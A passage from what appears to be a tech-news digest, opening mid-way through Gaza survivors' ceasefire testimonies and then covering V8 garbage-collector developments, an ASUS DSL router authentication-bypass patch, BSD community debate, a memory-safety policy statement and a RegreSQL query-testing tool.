“What I miss most is reassurance,” she says. “The simple feeling of waking up and knowing where your day will go. My wish now is to have one normal day.” This genocide shattered Hala into fragments: a girl who once dreamed and a woman who now struggles to survive.

In Gaza, living becomes the harder choice, more complicated than death itself. “There’s no triumph in surviving. It’s a different kind of pain,” Hala reflects. “You wake up every day carrying the guilt of still being alive when others—people you loved—are gone and didn’t make it till the end. We survived to tell their stories, to honor them, but survival isn’t a privilege.” Slowly, she is learning to breathe again. “Life feels fragmented, but with each child’s laugh, with every sunrise piercing the ruins, we inch toward the possibility of breathing—just a little. Not because we are OK, but because we have to try,” she says.

“I Take More Photos Now Than During the War Itself”

For Anas Zayed Fteiha, a 31-year-old photojournalist with Anadolu Agency, the ceasefire has meant returning to work to document the aftermath of destruction. (Fteiha is currently pursuing legal action against the global publishing company Axel Springer, which he has accused of violating his constitutional rights after one of its tabloids in Germany accused him of being a propagandist for Hamas.)

“The war has not really ended,” he says, noting the breaches in the truce and the ongoing human cost for those left behind. “For mothers who lost their children, for those who lost limbs, for families left homeless—the war never stopped.” But there is a paradoxical relief in the pause. “I feel relief, but fear persists,” Fteiha says. “There’s comfort in not hearing the explosions daily, but the trauma is not gone.”

What was once Anas Zayed Fteiha’s home before the war. Photo: Anas Zayed Fteiha

The people who lost their homes and have nowhere to go are what still haunts Anas after the ceasefire. “This genocide stole many friends and colleagues — and my home, the house I grew up in. Our lives have shattered. Gaza is no longer a livable place,” he says. “Sometimes we envy the martyrs who were killed — they’ve survived the pain and suffering we now face.”

“Gaza is no longer a livable place.”

Even as the ceasefire seems to hold, his work is intensifying, and his camera keeps clicking, capturing shots of survival and grief. The rubble and the lives scattered among it demand documentation. “I take more photos now than during the war itself. There are so many stories that must be told,” he says.

The experience has reshaped his understanding of journalism. “I thought journalism was protected. I thought journalists were respected. In Gaza, I learned the hard truth: Our work is sacred, but we are not protected. We witness, and we are vulnerable,” Anas says.

“We’re Living in a City of Ghosts”

Nooh Al-shaghnobi, 24, a civil defense worker, witnessed the war from the front lines of rescue operations. “I didn’t believe the ceasefire at first,” he says. “Even now, there are breaches and attacks on the so-called ‘yellow zones’ the army designated, and we are still pulling bodies from the rubble. Thousands of bodies remain under the rubble — around 10,000 people . The war didn’t really stop; it just began a new phase.”

“We work with shovels, hammers, and basic tools. To remove one body can take a whole day.”

Al-shaghnobi stayed in Gaza City, on duty, and refused to leave with his family to the south as two years of genocide stretched on, and now, Al-shaghnobi describes the recovery work as grueling and deeply traumatic. With limited equipment, each recovery is a struggle. “We work with shovels, hammers, and basic tools. To remove one body can take a whole day. And the smell, the sight of decomposed remains, skeletons, skulls, bones — it is impossible to forget. We’re living in a city of ghosts,” he says.

Nooh Al-shaghnobi with his friend Saleh Aljafarawi, left, a journalist who was killed after the ceasefire was announced. Photo: Nooh Al-shaghnobi

Faith and resilience, he says, have been reshaped. “I saw miracles, and I survived each time the Civil Defense team was directly targeted while many of my colleagues were killed. That changed me. But our dreams, our lives, everything is fragile. Any moment, it can vanish,” he says.

“The war didn’t really stop; it just began a new phase.”

Al-shaghnobi’s work makes him confront mortality every day. “Honestly, those who died are the ones who really survived. Yet for those of us who survived, it’s like living in a body without a soul. The war took our loved ones, our homes, and our hope. We’ve learned to live numb. We’ve witnessed so much death and destruction that it has become part of our daily life,” he says.

Even in moments of gratitude, there is also pain. Al-shaghnobi recalled the shock of losing his close friend, the journalist Saleh Aljafarawi, just days after the ceasefire was announced: “We celebrated surviving the massacre, only to see him killed. That’s the reality here — the ceasefire is never complete. The danger never ends.”

“Joy and Fear Mixed Together”

Sara Bsaiso, 32, a human resources manager, echoed this mixture of relief and lingering terror. “When I heard about the ceasefire, it felt like just another headline. We’ve heard about ceasefires before. They never lasted. We didn’t believe this one would either. Only when the bombing truly stops will we believe the war has ended,” she says.

After her family was forced to repeatedly flee south in March 2024 and returned north in February 2025, only to flee again before this most recent ceasefire, Bsaiso carries the exhaustion of displacement . Survival now means facing a new battle: “Sometimes I think those who were killed might be in a better place than us — because what lies ahead is another kind of war: rebuilding from nothing, living without homes, jobs, or normal life.”

Hossam Bsaiso, Sara’s brother, after his release from Israeli prison. Photo: Sara Bsaiso

She reflects on what the war stole. “It took our sense of time, safety, stability, normalcy, minds, lives, homes, jobs,” and, for a time, her brother. Hossam, 36, was imprisoned for over a year in Israeli prisons. She describes the moment when her family found out her brother would be released. “When we saw his name on the list of released prisoners, joy and fear mixed together. We were terrified it might change at the last minute. When we finally saw him before us, safe — it felt like a dream. That was our greatest wish throughout the war,” she says.

“Now we cherish the smallest things: a meal, a bed, a roof over our heads. It’s changed how we think about life and what we prioritize,” she says. Her words capture the quiet appreciation for life in the shadow of destruction. Even as she rebuilds her life, fear lingers, an invisible shadow that no ceasefire can erase. “We survived,” she says, “but the next war could come at any moment.” Despite everything, Sara is trying to find a sense of normalcy. “We must try to breathe again, no matter how much pain we’ve endured. We were born for a reason, and we have to start over with determination and bring life back again,” Bsaiso says.

“All We Can Do Now Is Wait and Pray”

For Walaa Shublaq, a 29-year-old architect and visual artist, the announcement of a ceasefire brought a feeling she hadn’t known in years — a fragile, fleeting joy.

But in the days that followed, the silence was unbearable. The war replayed endlessly in her mind: scene after scene, sound after sound. While the world celebrated, she felt only anger and exhaustion. “I couldn’t even respond to messages of congratulations,” she says. “I was angry — at everyone who could have stopped this bloodshed but didn’t.” For Shublaq, survival has been a burden. It meant abandoning everything and everyone she loved just to stay alive, running from one death to another. “Sometimes we envied the martyrs,” she says. “They had completed their test. But for us who survived, the test continues.”

“I found a kind of freedom — from illusion, from attachment.”

The genocide robbed her not just of her home, but also her sense of self. Her grandmother, her friends, her art, her dreams — all gone. “Now, I no longer mourn the material things I lost; I mourn their meaning,” she says. But amid all that loss, something shifted. “I found a kind of freedom — from illusion, from attachment. I learned that emptiness can only be filled with light,” she says. Among the ruins, she rediscovered fragments of her past, including the signed contract for her first book .

Shublaq still remembers images of the genocide: barefoot children chasing water carts, smoke from wood-fire ovens choking the air, overcrowded donkey carts, and the constant hum of Israeli drones. Now, she wants to forever forget the faces of soldiers, the tanks, and the nights she ran barefoot through the streets to escape death.

As part of the ceasefire deal, more than 1,700 Palestinian prisoners were released from Israeli prisons in October; among them were two of Shublaq’s brothers, Anas and Abdullah. They had been imprisoned for one year and eight months, enduring brutal physical and psychological torture. Another of her brothers, Omar, remains captive. “When my phone rang that night and I heard, ‘Walaa? It’s Anas — your brother,’ I broke down in tears,’ she says. “On that day, we waited for my brothers for long hours from the day till we finally met at night at 9 p.m. in absolute darkness. The reunion was bittersweet — joy shadowed by the absence of our third brother.”

“They came back older, heavier with time, but still radiant with life,” she says. When asked about the future, she hesitates. “I’ve lost the ability and the desire to plan,” she says. “All we can do now is wait and pray for a vast and merciful relief.”

“Our Bodies Survived, but Our Souls Didn’t”

Asem Alnabih, 35, a former spokesperson for Gaza Municipality who’s now a correspondent for Al-Araby TV, approached the ceasefire with measured skepticism. “There is no safety,” he says. “The city is still in crisis: water shortages, blocked streets, broken sewage systems. Even after the ceasefire, people are living in a state of collapse, and they are struggling for basic services.” People in Gaza often say, ‘After the war comes another war.’ This is the reality now.

Asem Alnabih, right, and his friend Dr. Refaat Alareer, left, who was later killed in a Dec. 7, 2023, Israeli airstrike. Photo: Asem Alnabih

“The city is still in crisis: water shortages, blocked streets, broken sewage systems.”

Like Al-shaghnobi, Alnabih stayed in Gaza City, never moving to the south. “I slept in a car, a park, a building basement, municipal facilities, friends’ homes, and even with strangers. Displacement became part of daily life,” he says. He describes what home means to him: a place where his family could sit together peacefully, coos, laugh, and feel safe.

For Alnabih, the war has meant the loss of relatives, friends, and normalcy. “It took my closeness to my wife and children — I’ve been separated from them since before the war; they were abroad. It took my nephew Ahmed, my niece Rasha, and my brother-in-law Motaz. It took my dear friend Dr. Refaat Alareer , one of the brightest souls I knew. It left me surrounded by loss, loneliness, and grief.”

He describes survival as a “delayed death.” “Maybe our bodies survived, but our souls didn’t,” he says. Like all the people of Gaza, Asem’s dreams have become so simple: a peaceful night’s sleep, a meal without fear, and a meeting not torn apart by a bombing. “But my deeper dream is that our sacrifices finally lead to something — that we live free, in our own land, with dignity,” he continued. “Peace is only possible when Palestinians receive their full rights.”

“Peace is only possible when Palestinians receive their full rights.”

The ceasefire may have silenced the bombs, but it has not ended the war — not the one inside people, nor the one against their right to exist. In Gaza, peace is not the sound of quiet skies; it is the dream of justice that remains deferred.

Every survivor now carries the weight of survival, not as triumph, but as testimony. They live among ruins, haunted by what was taken and what could return at any moment. But even here, between grief and persistence, they reach for the smallest signs of life: a child’s laughter, a brother returned home, or the morning sun rising over broken walls.

V8 Garbage Collector

Hacker News
wingolog.org
2025-11-14 09:53:13
Comments...
Original Article

Let’s talk about memory management! Following up on my article about 5 years of developments in V8’s garbage collector , today I’d like to bring that up to date with what went down in V8’s GC over the last couple years.

methodololology

I selected all of the commits to src/heap since my previous roundup. There were 1600 of them, including reverts and relands. I read all of the commit logs, some of the changes, some of the linked bugs, and any design document I could get my hands on. From what I can tell, there have been about 4 FTE from Google over this period, and the commit rate is fairly constant. There are very occasional patches from Igalia, Cloudflare, Intel, and Red Hat, but it’s mostly a Google affair.

Then, by the very rigorous process of, um, just writing things down and thinking about it, I see three big stories for V8’s GC over this time, and I’m going to give them to you with some made-up numbers for how much of the effort was spent on them. Firstly, the effort to improve memory safety via the sandbox: this is around 20% of the time. Secondly, the Oilpan odyssey: maybe 40%. Third, preparation for multiple JavaScript and WebAssembly mutator threads: 20%. Then there are a number of lesser side quests: heuristics wrangling (10%!!!!), and a long list of miscellanea. Let’s take a deeper look at each of these in turn.

the sandbox

There was a nice blog post in June last year summarizing the sandbox effort : basically, the goal is to prevent user-controlled writes from corrupting memory outside the JavaScript heap. We start from the assumption that the user is somehow able to obtain a write-anywhere primitive, and we work to mitigate the effect of such writes. The most fundamental way is to reduce the range of addressable memory, notably by encoding pointers as 32-bit offsets and then ensuring that no host memory is within the addressable virtual memory that an attacker can write. The sandbox also uses some 40-bit offsets for references to larger objects, with similar guarantees. (Yes, a sandbox really does reserve a terabyte of virtual memory).

But there are many, many details. Access to external objects is intermediated via type-checked external pointer tables . Some objects that should never be directly referenced by user code go in a separate “trusted space”, which is outside the sandbox. Then you have read-only spaces, used to allocate data that might be shared between different isolates, you might want multiple cages , there are “shared” variants of the other spaces, for use in shared-memory multi-threading, executable code spaces with embedded object references, and so on and so on. Tweaking, elaborating, and maintaining all of these details has taken a lot of V8 GC developer time.

I think it has paid off, though, because the new development is that V8 has managed to turn on hardware memory protection for the sandbox : sandboxed code is prevented by the hardware from writing memory outside the sandbox.

Leaning into the “attacker can write anything in their address space” threat model has led to some funny patches. For example, sometimes code needs to check flags about the page that an object is on, as part of a write barrier. So some GC-managed metadata needs to be in the sandbox. However, the garbage collector itself, which is outside the sandbox, can’t trust that the metadata is valid. We end up having two copies of state in some cases: in the sandbox, for use by sandboxed code, and outside, for use by the collector.

The best and most amusing instance of this phenomenon is related to integers. Google’s style guide recommends signed integers by default , so you end up with on-heap data structures with int32_t len and such. But if an attacker overwrites a length with a negative number, there are a couple funny things that can happen. The first is a sign-extending conversion to size_t by run-time code , which can lead to sandbox escapes. The other is mistakenly concluding that an object is small, because its length is less than a limit, because it is unexpectedly negative . Good times!

oilpan

It took 10 years for Odysseus to get back from Troy, which is about as long as it has taken for conservative stack scanning to make it from Oilpan into V8 proper. Basically, Oilpan is garbage collection for C++ as used in Blink and Chromium. Sometimes it runs when the stack is empty; then it can be precise. But sometimes it runs when there might be references to GC-managed objects on the stack; in that case it runs conservatively.

Last time I described how V8 would like to add support for generational garbage collection to Oilpan , but that for that, you’d need a way to promote objects to the old generation that is compatible with the ambiguous references visited by conservative stack scanning. I thought V8 had a chance at success with their new mark-sweep nursery , but that seems to have turned out to be a lose relative to the copying nursery. They even tried sticky mark-bit generational collection , but it didn’t work out . Oh well; one good thing about Google is that they seem willing to try projects that have uncertain payoff, though I hope that the hackers involved came through their OKR reviews with their mental health intact.

Instead, V8 added support for pinning to the Scavenger copying nursery implementation . If a page has incoming ambiguous edges, it will be placed in a kind of quarantine area for a while. I am not sure what the difference is between a quarantined page, which logically belongs to the nursery, and a pinned page from the mark-compact old-space; they seem to require similar treatment. In any case, we seem to have settled into a design that was mostly the same as before, but in which any given page can opt out of evacuation-based collection.

What do we get out of all of this? Well, not only can we get generational collection for Oilpan, but also we unlock cheaper, less bug-prone “direct handles” in V8 itself.

The funny thing is that I don’t think any of this is shipping yet; or, if it is, it’s only in a Finch trial to a minority of users or something. I am looking forward in interest to seeing a post from upstream V8 folks; whole doctoral theses have been written on this topic , and it would be a delight to see some actual numbers.

shared-memory multi-threading

JavaScript implementations have had the luxury of a single-threadedness: with just one mutator, garbage collection is a lot simpler. But this is ending. I don’t know what the state of shared-memory multi-threading is in JS , but in WebAssembly it seems to be moving apace , and Wasm uses the JS GC. Maybe I am overstating the effort here—probably it doesn’t come to 20%—but wiring this up has been a whole thing .

I will mention just one patch here that I found to be funny. So with pointer compression, an object’s fields are mostly 32-bit words, with the exception of 64-bit doubles, so we can reduce the alignment on most objects to 4 bytes. V8 has had a bug open forever about alignment of double-holding objects that it mostly ignores via unaligned loads.

Thing is, if you have an object visible to multiple threads, and that object might have a 64-bit field, then the field should be 64-bit aligned to prevent tearing during atomic access, which usually means the object should be 64-bit aligned. That is now the case for Wasm structs and arrays in the shared space.

side quests

Right, we’ve covered what to me are the main stories of V8’s GC over the past couple years. But let me mention a few funny side quests that I saw.

the heuristics two-step

This one I find to be hilariousad. Tragicomical. Anyway I am amused. So any real GC has a bunch of heuristics: when to promote an object or a page, when to kick off incremental marking, how to use background threads, when to grow the heap, how to choose whether to make a minor or major collection, when to aggressively reduce memory, how much virtual address space can you reasonably reserve, what to do on hard out-of-memory situations, how to account for off-heap mallocated memory, how to compute whether concurrent marking is going to finish in time or if you need to pause... and V8 needs to do this all in all its many configurations, with pointer compression off or on, on desktop, high-end Android, low-end Android, iOS where everything is weird, something called Starboard which is apparently part of Cobalt which is apparently a whole new platform that Youtube uses to show videos on set-top boxes, on machines with different memory models and operating systems with different interfaces, and on and on and on. Simply tuning the system appears to involve a dose of science, a dose of flailing around and trying things, and a whole cauldron of witchcraft. There appears to be one person whose full-time job it is to implement and monitor metrics on V8 memory performance and implement appropriate tweaks. Good grief!

mutex mayhem

Toon Verwaest noticed that V8 was exhibiting many more context switches on MacOS than Safari, and identified V8’s use of platform mutexes as the problem. So he rewrote them to use os_unfair_lock on MacOS. Then implemented adaptive locking on all platforms . Then... removed it all and switched to abseil .

Personally, I am delighted to see this patch series, I wouldn’t have thought that there was juice to squeeze in V8’s use of locking. It gives me hope that I will find a place to do the same in one of my projects :)

ta-ta, third-party heap

It used to be that MMTk was trying to get a number of production language virtual machines to support abstract APIs so that MMTk could slot in a garbage collector implementation. Though this seems to work with OpenJDK, with V8 I think the churn rate and laser-like focus on the browser use-case makes an interstitial API abstraction a lose. V8 removed it a little more than a year ago .

fin

So what’s next? I don’t know; it’s been a while since I have been to Munich to drink from the source. That said, shared-memory multithreading and wasm effect handlers will extend the memory management hacker’s full employment act indefinitely, not to mention actually landing and shipping conservative stack scanning. There is a lot to be done in non-browser V8 environments, whether in Node or on the edge, but it is admittedly harder to read the future than the past.

In any case, it was fun taking this look back, and perhaps I will have the opportunity to do this again in a few years. Until then, happy hacking!

ASUS warns of critical auth bypass flaw in DSL series routers

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 09:52:37
ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. [...]...
Original Article

ASUS

ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models.

Tracked as CVE-2025-59367 , this vulnerability allows remote, unauthenticated attackers to log into unpatched devices exposed online in low-complexity attacks that don't require user interaction.

ASUS has released firmware version 1.1.2.3_1010 to address this vulnerability for DSL-AC51, DSL-N16, and DSL-AC750 router models.

Wiz

"An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system," ASUS explains .

"ASUS recommends update to the latest firmware to ensure your device remains protected. Download and install the latest firmware version 1.1.2.3_1010 for your device from the ASUS support page or your product page at ASUS Networking."

While the Taiwanese electronics manufacturer only mentions three affected router models, it also provides mitigation measures for users who can't immediately update their devices or have end-of-life models that will not receive firmware updates.

To block potential attacks without patching the routers, users are advised to disable any services accessible from the Internet, including remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP.

ASUS also recommends taking additional measures to secure routers and reduce the attack surface, including using complex passwords for the router administration page and wireless networks, regularly checking for security updates and new firmware, and avoiding the reuse of credentials.

While there are no reports of active exploitation, it is strongly recommended to install the latest firmware as soon as possible, as attackers commonly target router flaws to infect devices with botnet malware, which they then use in DDoS attacks.

For instance, in June, CISA added two older security flaws impacting ASUS RT-AX55 (CVE-2023-39780) and ASUS GT-AC2900 (CVE-2021-32030) routers to its catalog of actively exploited vulnerabilities.

As cybersecurity company GreyNoise and French cybersecurity firm Sekoia revealed at the time, "a well-resourced and highly capable adversary" tracked as Vicious Trap used CVE-2023-39780 and CVE-2021-32030 to backdoor thousands of ASUS routers in attacks aimed at building a new botnet, tracked as AyySSHush .

In April, ASUS patched another critical authentication bypass vulnerability ( CVE-2025-2492 ) in a wide range of router models with the AiCloud service enabled.

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Audio-primary content for inspiration in software development?

Lobsters
lobste.rs
2025-11-14 09:51:26
Hello fellow beings, First of all, this is really generic, hence why I tagged it as 'programming'. Please say outright if this doesn't belong here. I'm in the situation where I have to drive a few hour (I'm in Europe, so <5h) trips once or twice a month, and I'm looking for some sources with insp...
Original Article

Hello fellow beings,

First of all, this is really generic, hence why I tagged it as 'programming'. Please say outright if this doesn't belong here.

I'm in the situation where I have to drive a few hour (I'm in Europe, so <5h) trips once or twice a month, and I'm looking for some sources with inspirational content about software development. This driving time usually encourages (or makes room for) creative thinking about new project ideas etc., so I'd love to get more inspiration or new technologies to tinker with.

Is there something like this which is interesting to someone who likes to learn about niché stuff people are building? Less Javascript frameworks, more offline-first, htmx, creative uses of sqlite, ...

Thinking of it, I'm looking for an audio version of some of the stuff we're seeing on lobsters.

Video content is fine too, as long as it's possible to grasp the content without seeing the slides. Podcasts, YouTube channels, or links to single talks/episodes/... are all good.

This Isn't a Battle

Lobsters
my-notes.dragas.net
2025-11-14 09:23:47
Comments...
Original Article

Published on: by Stefano Marinelli

4 min read

Photo by Dan Meyers on Unsplash

Photo by Dan Meyers on Unsplash

Last night, I read a blog post with great interest .

As is often the case, I found points where I agreed (at least partially) with the author, and others where I completely disagreed. And that’s perfectly fine.

There was one point, however, where my disagreement was total. I'll quote a part of the article here: “The FreeBSD community is...difficult. What I mean by this is that it feels much like the average Linux community in the early 2000s: it looks down on others (in this case Linux users), it appears rather unwelcoming and at times downright toxic. Any time you mention anything vaguely related to Linux you'll inevitably cause somebody to go on a massive rant about how FreeBSD is better than Linux.

It also seems there's a general dislike for change, even if said change is for the better. It feels like a form of "tech boomerism": change is bad because it's not what we're used to, even if the end result is in fact better.”

Frankly, my own experience has been the complete opposite. The communities around the BSD systems are open, friendly, and extremely approachable - though, of course, everyone has their own personality, and toxic people can exist within these communities as well. When I started becoming more active in the BSD community, I received a completely unexpected welcome. The BSD conferences I've attended have the atmosphere of a family, of close friends. No one shows up to boast, but to discuss, to dialogue. In a word: to build .

But I picked up on two details from the excerpt: “mention anything vaguely related to Linux” and “tech boomerism: change is bad because it’s not what we’re used to, even if the end result is in fact better”. This suggested something to me that was later confirmed when the author mentioned the “three firewalls competing with each other” within FreeBSD.

They don’t compete with each other. They coexist - and that’s a completely different thing. This gave me the key to understanding the previous part as well.

This isn't a battle. We aren't in a ruthless commercial arena where different solutions copy each other to get ahead, hoping to attract "users" (better: paying customers) from the other side. And unfortunately, this is something that has been happening in many "mainstream" Open Source communities for a while now. It's a loss of the Open Source philosophy - of doing something for the pleasure of it, to have something different, and to be open to contributions from others, as well as the idea of making what you create public and free. Whether it's with licenses like the GPL or like BSD, MIT, etc., the spirit is to say: “Here it is. If it’s useful to you, take it. If you want, contribute. Otherwise, you can move on; you have no constraints or obligations.”

I often see curious Linux users arriving in BSD communities, and that’s fantastic. The spirit is almost always positive, exploratory: “What can the BSDs do for me?” And sometimes, that turns into, “What can I do for the BSDs?”

But this isn't a religion - you don't need to choose one - and you can use different OSes based on your needs. I happily use Linux, in its various distributions, for some of my workloads. I'm writing this post on a mini PC running openSUSE Tumbleweed, on btrfs, and it works wonderfully. No BSD, at the moment, has adequate support for this machine. I use Linux, and I'm happy with it.

The purpose of the BSDs, like other Open Source operating systems less adopted than Linux and its distributions, isn't to "win" or to "emulate" but to be themselves. So, arriving in a BSD community and saying "but on Linux..." as if it were an example to be followed, has, over time, become an attitude that is not well-tolerated.

BSD communities value stability - and these communities are much, much smaller than those around projects like Linux and its distributions. It's therefore inevitable that some things will lag behind or that they won't want to embark on projects that might leave something unfinished and malfunctioning. Unfortunately, this sometimes happens anyway. It's better not to seek it out deliberately.

Desktop use for the BSDs has never been a primary focus, particularly for FreeBSD and NetBSD. To judge them on this metric alone is, therefore, extremely limiting and, in a sense, unfair.

So, coming back to the article I read - I understand some of the author's points of view, but calling the FreeBSD community a form of tech "boomers" or "toxic" because it doesn't want to follow Linux's example is, in my opinion, a flawed approach to an autonomous, different operating system.

Let's try to shake off the aggressive, competitive, and monopolistic dynamics when we approach the Open Source world. The plurality of completely autonomous choices is a richness for everyone. Monoculture is always harmful and, in the long run, destructive.

It reminds me of the time when all smartphone manufacturers were trying to copy the iPhone as much as possible. All the phones were the same: either originals or copies, but all extremely similar. How boring.

Ask HN: Is building for the web even worth it now?

Hacker News
news.ycombinator.com
2025-11-14 08:10:44
Comments...
Original Article

Of late, I’ve found my relationship with internet changing. I was here back in the early 2000s and it has always been the first place I go to for entertainment, advice, and work

But increasingly, I find myself completely disengaged with the internet. Every time I see a text post, I start asking myself: is this even a real person? Am I just talking to a bot?

Every time I see a yellow-tinged image on any of my social media feeds, I mentally switch off. I know it was made by AI and I just find it hard to engage with anything AI-made, no matter how good

Same for any AI video that pops up on my feed. It just doesn’t make me scroll past it, it makes me question why am I even here and I end up leaving

I know I can’t be the only one. I used to love the internet because it was one place where I could engage with people from all over the world. But now, it feels like I just spend half my energy on figuring out which one is real, which one is AI

The line will eventually blur and as a late 30s guy, I really don’t want to spend any more of my time on earth talking to a bot

As someone who used to create and build for the web, I find myself increasingly disengaged and discouraged. I’m pouring into a rapidly emptying cup

Anyone else feel the same way?

Show HN: Pegma, the free and open-source version of the classic Peg solitaire

Hacker News
pegma.vercel.app
2025-11-14 08:06:41
Comments...
Original Article

Pegma

Discover Pegma, the free and open source version of the classic Peg solitaire! Enjoy the timeless puzzle on your mobile device!

Support the call for Memory Safety incentives in EU cybersecurity policies - Trifecta Tech Foundation

Lobsters
trifectatech.org
2025-11-14 07:22:10
Comments...
Original Article

Improving Europe's cybersecurity posture through memory safety

With the upcoming Cyber Resilience Act in the EU mandating a secure-by-design development process, we urge organisations and individuals to support our statement "Improving Europe's cybersecurity posture through memory safety" .

The statement is a joint effort by secure-by-design experts at leading organizations, including Siemens Mobility, Sovereign Tech Agency, OpenSSF, Google, the Linux Foundation, the Rust Foundation, and national cybersecurity committees.

See the How to show support section to add your name to the call.

Executive summary:

“The number of cybersecurity incidents that affect European citizens and businesses is rising at an alarming rate. 70% of the vulnerabilities in major digital systems built on decades-old technologies share the same root cause and can be prevented by using modern, memory-safe technology.

This technology is mature, perfectly fits Europe’s forthcoming secure-by-design approach to cybersecurity, and is the most effective way to protect Europe’s cybersecurity, to reduce cybersecurity costs, and to foster innovation.

However, its adoption rate is slow due to a lack of short-term economic incentives. We’ve now left the door wide open: attackers eagerly exploit vulnerabilities in our major digital systems.

The supporting organisations call on European and national policymakers to act, out of obligation as well as untapped opportunity: to provide clear incentives and support for the large-scale adoption of memory-safe technology.”

The full statement can be read here .

The time is now

Having established a lack of awareness from EU and national policy makers, Tara Tarakiyee and myself, Hugo van de Pol initiated and led joint discussions with security experts and industry stakeholders, and authored the statement as a result.

This lack of awareness contrasts heavily to the proactive involvement of the Cybersecurity and Infrastructure Security Agency (CISA) , among others, in the USA from 2023 onwards. With the CRA on its way, and the examples of CISA et al at our disposal, now is the time for the EU to act.

How to show support

If you agree with our position that memory safety should be on the EU and national cybersecurity agendas, please consider adding your name to this statement to show your support. You can support the statement as an organisation or as an individual.

Having your name on the statement does not come with any further commitments; it is simply to indicate your agreement with the statement.

Indicating your support is easy: send an email to Hugo van de Pol in which you state the name of the supporting organisation, or your name and affiliation.

If you know someone who might do the same, please feel free to send them this web page and/or the PDF of the statement .


List of supporters

Supporting organizations:

... more tba


Contributors

Contributions to this statement were made by:

  • Josh Aas, Internet Security Research Group
  • Rebecca Rumbul, Rust Foundation
  • Thomas Rooijakkers, TNO
  • Jeffrey Vander Stoep, Google
  • Benjamin Schilling
  • Christian (fukami) Horchert, CrabNebula Ltd.
  • prof. dr. H.J. Bos, Vrije Universiteit Amsterdam
  • Erik Poll, Radboud University
  • Harry van Haaren, Openchip,
  • Marius Gläß, Bundesamt für Sicherheit in der Informationstechnik

Tara Tarakiyee is a Technologist at Sovereign Tech Agency , who works on designing supporting and mobilizing resources to encourage, sustain and maintain our open digital infrastructure.

Hugo van de Pol is Director at Tweede golf and Board member at Trifecta Tech Foundation , who has been advocating the use of memory-safe technologies like Rust for years.



RegreSQL: Regression Testing for PostgreSQL Queries

Hacker News
boringsql.com
2025-11-14 07:10:10
Comments...
Original Article

TL;DR - RegreSQL brings PostgreSQL's regression testing methodology to your application queries, catching both correctness bugs and performance regressions before production.

As puzzling as it might seem, the common problem with production changes is the ever-present "AHA" moment when things start slowing down or crashing straight away. Testing isn't easy as it is, but there's a widespread practice gap when it comes to testing SQL queries. Some might pretend to "fix it" by using ORMs to abstract away the problem. Others treat SQL as "just glue code" that doesn't deserve systematic testing. Most settle for integration tests that verify the application layer works, never actually testing whether their queries will survive the next schema change or index modification.

For PostgreSQL development itself, the project has a robust regression test suite that has been preventing disasters in core development for decades. The database itself knows how to test SQL systematically - we just don't use those same techniques for our own queries. Enter RegreSQL , a tool originally created by Dimitri Fontaine for The Art of PostgreSQL book (which is excellent for understanding and mastering PostgreSQL as a database system), designed to bring the same regression testing framework to our application queries.

I've been trying to use it for some time, but due to missing features and limitations gave up several times. Until now. I decided to fork the project and spend the time needed to take it to the next level.

Introduction

The RegreSQL promise starts with the biggest strength and perceived weakness of SQL queries. They are just strings. And unless you use something like sqlc (for Go), PG'OCaml or Rust's SQLx toolkit giving you compile-time checking, your queries are validated only when they are executed. Which in better case mean either usually slow-ish test suite or integration tests, in worst scenario only when deployed. ORMs are another possibility - completely abstracting away SQL (but more on that later).

But even with compile-time checking, you are only checking for one class of problems: schema mismatches. What about behavior changes after schema migration or performance regressions? What about understanding whether your optimization actually made things faster or just moved the problem elsewhere?

This is where RegreSQL comes in. Rather than trying to turn SQL into something else, RegreSQL embraces "SQL as strings" reality and applies the same testing methodology PostgreSQL itself uses: regression testing. You write (or generate - continue reading) your SQL queries, provide input data, and RegreSQL verifies that future changes don't break those expectations.

The features don't stop there though - it tracks performance baselines, detects common query plan regressions (like sequential scans), and gives you framework for systematic experimentation with the schema changes and query change management.

Enough with theory. Let's jump in straight into the action and see what a sample run of RegreSQL looks like

$ regresql text
Connecting to 'postgres://radim:password123@192.168.139.28/cdstore_test'… ✓

Running regression tests...

✓ album-by-artist_list-albums-by-artist.1.json (0.00s)
✓ album-by-artist_list-albums-by-artist.2.json (0.00s)

✓ album-tracks_list-tracks-by-albumid.2.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.1.json (0.00s)

✓ artist_top-artists-by-album.1.json (0.00s)

✓ genre-topn_genre-top-n.top-1.json (0.00s)
✓ genre-topn_genre-top-n.top-3.json (0.00s)

✓ genre-tracks_tracks-by-genre.json (0.00s)

Results: 8 passed, 0 failed, 8 skipped (0.00s)

In this example based on Chinook database (as used originally in The Art of PostgreSQL book), RegreSQL scans the current directory (or one provided by -C /path/to/project ) for *.sql files and attempts to run all queries against the configured PostgreSQL connection.

The individual files can contain either single or multiple sql queries. Like following example

-- name: top-artists-by-album
-- Get the list of the N artists with the most albums
SELECT
    artist.name,
    count(*) AS albums
FROM
    artist
    LEFT JOIN album USING (artist_id)
GROUP BY
    artist.name
ORDER BY
    albums DESC
LIMIT :n;

The syntax for the queries supports both positional arguments (like $1 known from libpq library) or (preferred) psql style variable ( :varname ). The each identified query (not file) is then executed for 0..N times, based on number of predefined plans and verified to the expected results - validating the expected data matches the one returned. The support for SQL files handling is available separately with https://github.com/boringSQL/queries (Go version only for now).

This gives you what original RegreSQL tool has introduced - change your schema, refactor a query, run regresql test and see immediately what broke. The test suite now has ability to catch regressions before they are committed / shipped. The current version built on top of it, giving you better console formatter instead of TAP style output, as well as jUnit, JSON and GitHub actions formatters for better integration into your CI/CD pipelines.

Performance regression testing

Basic regression testing catches correctness issues - wrong results, broken queries, schema mismatches. But there's another class of production issues it misses. Performance regressions. No matter how unbelievable it might sound but queries get deployed without appropriate indexes, or they change over time. Simple fix - both for handwritten SQL or ORM code - can switch from milliseconds to seconds. You add index that helps one query, but tanks another. You modify conditionals and accidently force sequential scan of millions of rows. This is where it hurts.

RegreSQL addresses this by tracking performance baselines alongside correctness. Once baselines are generated

$ regresql baseline
Connecting to 'postgres://appuser:password123@192.168.139.28/cdstore_test'… ✓
Creating baselines directory: regresql/baselines
Creating directory 'regresql/baselines'

